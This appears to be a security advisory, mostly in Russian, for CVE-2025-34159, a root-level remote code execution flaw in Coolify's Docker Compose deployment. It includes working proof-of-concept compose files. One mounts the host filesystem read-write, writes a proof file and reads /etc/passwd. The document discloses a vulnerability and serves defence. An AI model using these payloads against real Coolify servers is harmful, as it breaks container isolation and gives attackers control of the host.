
A critical Remote Code Execution (RCE) vulnerability exists in Coolify's application deployment workflow. This flaw allows a low-privileged member to inject arbitrary Docker Compose directives during project creation or updates. By defining a malicious service that mounts the host filesystem an attacker can achieve root-level command execution on
| Поле | Значение |
|---|---|
| CVE ID | CVE-2025-34159 |
| Затрагивает | Coolify ≤ v4.0.0-beta.420.6 |
| Исправлено в | v4.0.0-beta.420.7 |
| Серьёзность | Critical |
| CVSS 4.0 | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| CWE | CWE-78 (OS Command Injection), CWE-20 (Improper Input Validation) |
Критическая уязвимость удалённого выполнения кода (RCE) существует в процессе развёртывания приложений Coolify. Эта ошибка позволяет участнику с низкими привилегиями внедрять произвольные директивы Docker Compose при создании или обновлении проекта. Определяя вредоносный сервис, который монтирует файловую систему хоста, атакующий может добиться выполнения команд на уровне root на хост-ОС, полностью обходя изоляцию контейнеров.
Уязвимость существует в процессе развёртывания проектов, где предоставленные пользователем конфигурации Docker Compose обрабатываются без достаточной проверки или изоляции (sandboxing).
version: '3.8'
services:
poc-host-root:
image: alpine:3.19
tty: true
volumes:
- /:/host:rw
command: >
sh -c "
echo '[*] Proof of RCE on host' &&
echo 'RCE by Eyodav' > /host/tmp/proof_rce.txt &&
whoami &&
id &&
uname -a &&
head -n 5 /etc/passwd
"
Результат: После развёртывания на хост-системе появляется /tmp/proof_rce.txt, что подтверждает RCE с привилегиями root.
version: '3.8'
services:
poc-host-write:
image: alpine:3.19
tty: true
volumes:
- /home/eyodav/PoC:/host
command: >
sh -c "
set -e;
mkdir -p /host &&
echo '[*] Writing PoC file to host mount...' &&
echo RCE_PoC_from_container_$(date) > /host/RCE_PoC.txt &&
cd /host &&
pwd &&
ls -la
"
/tmp/proof_rce.txt) или просмотрев вывод команд в журналах развёртывания